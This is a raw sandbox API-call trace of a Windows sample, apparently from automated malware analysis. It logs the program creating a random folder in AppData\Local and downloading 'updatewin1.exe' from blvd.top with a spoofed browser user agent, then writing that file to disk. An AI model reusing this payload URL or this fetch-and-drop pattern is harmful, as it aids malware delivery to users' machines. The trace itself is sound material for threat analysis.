[0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac2960 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac39d0 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aaf190 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac52b0 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac5f30 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aafa18 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab02a0 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac4208 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac6bb0 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac73f8 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac3198 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac4a40 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac7c40 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aad7f8 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab13b0 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab1c38 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab0b28 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab2d48 | out: hHeap=0x260000) returned 1 [0185.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab35d0 | out: hHeap=0x260000) returned 1 Thread: id = 68 os_tid = 0xa44 Thread: id = 69 os_tid = 0xa74 Thread: id = 70 os_tid = 0xaa0 Thread: id = 71 os_tid = 0x344 Thread: id = 72 os_tid = 0xa4c Thread: id = 73 os_tid = 0x314 Thread: id = 74 os_tid = 0x6c8 Thread: id = 75 os_tid = 0xb14 Thread: id = 76 os_tid = 0x7fc [0165.951] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x110) returned 0x31a8c48 [0165.951] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x110) returned 0x348e48 [0165.961] GetLastError () returned 0x54f [0165.961] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3bc) returned 0x31c1a58 [0165.971] GetCurrentThreadId () returned 0x7fc [0165.971] SetLastError (dwErrCode=0x54f) [0165.971] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac098 [0165.971] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x283560 [0165.971] GetLastError () returned 0x54f [0165.971] SetLastError (dwErrCode=0x54f) [0165.971] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac0e0 [0165.971] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f1a8 [0165.972] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x283560 | out: hHeap=0x260000) returned 1 [0165.972] GetLastError () returned 0x54f [0165.972] SetLastError (dwErrCode=0x54f) [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f218 [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x48) returned 0x31c5cf0 [0165.972] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f1a8 | out: hHeap=0x260000) returned 1 [0165.972] GetLastError () returned 0x54f [0165.972] SetLastError (dwErrCode=0x54f) [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f1a8 [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x304218 [0165.972] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c5cf0 | out: hHeap=0x260000) returned 1 [0165.972] GetLastError () returned 0x54f [0165.972] SetLastError (dwErrCode=0x54f) [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f020 [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x90) returned 0x2b2cb8 [0165.972] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304218 | out: hHeap=0x260000) returned 1 [0165.972] GetLastError () returned 0x54f [0165.972] SetLastError (dwErrCode=0x54f) [0165.972] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318efb0 [0165.972] GetLastError () returned 0x54f [0165.972] SetLastError (dwErrCode=0x54f) [0165.972] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x348e48 | out: hHeap=0x260000) returned 1 [0165.972] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.973] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0165.973] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x400) returned 0x31b9668 [0165.973] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x31b9668 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0165.974] UuidCreate (in: Uuid=0x9a2d768 | out: Uuid=0x9a2d768) returned 0x0 [0166.029] UuidToStringA (in: Uuid=0x9a2d768, StringUuid=0x9a2d6c0 | out: StringUuid=0x9a2d6c0) returned 0x0 [0166.030] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318ee60 [0166.030] RpcStringFreeA (in: String=0x9a2d6c0 | out: String=0x9a2d6c0) returned 0x0 [0166.030] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned 1 [0166.030] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8"), lpSecurityAttributes=0x0) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x410) returned 0x31b9a70 [0166.032] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x410) returned 0x31b9e88 [0166.032] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1000) returned 0x31aa150 [0166.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31b9e88, cbMultiByte=-1, lpWideCharStr=0x31aa150, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned 81 [0166.032] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1010) returned 0x31f7fe8 [0166.033] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31aa150 | out: hHeap=0x260000) returned 1 [0166.033] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b9e88 | out: hHeap=0x260000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x283560 [0166.033] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0166.033] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac128 [0166.033] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x31b9e88 [0166.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31ac128, cbMultiByte=-1, lpWideCharStr=0x31b9e88, cchWideChar=1072 | out: lpWideCharStr="http://blvd.top/files/penelop/updatewin1.exe") returned 45 [0166.033] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x870) returned 0x31aa150 [0166.034] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b9e88 | out: hHeap=0x260000) returned 1 [0166.035] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac128 | out: hHeap=0x260000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x870) returned 0x31b9e88 [0166.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x31aa9c8 [0166.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x31aa9c8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0166.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x31f9000 [0166.045] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31aa9c8 | out: hHeap=0x260000) returned 1 [0166.045] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b9e88 | out: hHeap=0x260000) returned 1 [0166.045] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://blvd.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0166.927] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f9000 | out: hHeap=0x260000) returned 1 [0166.927] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0166.928] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac2d8 [0166.928] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x31f6ee8 [0166.928] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac2d8 | out: hHeap=0x260000) returned 1 [0166.928] lstrcpyA (in: lpString1=0x31b9668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" [0166.928] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe") returned 1 [0166.928] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x31bffe0 [0166.928] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0166.929] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0166.981] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0166.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.014] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.015] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.030] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.062] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.063] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.083] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.083] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.099] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.100] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.174] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.174] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.175] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.175] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.176] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.176] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.176] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.176] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.177] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.177] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.178] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.178] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.178] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.179] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.277] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.278] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.278] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.278] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.279] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.279] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.279] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.280] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.280] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.280] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.281] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.281] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.281] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.282] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.282] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.282] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.283] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.283] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.284] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.285] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0167.285] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0167.286] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0xa00) returned 1 [0167.286] WriteFile (in: hFile=0x5f0, lpBuffer=0x9a2d778*, 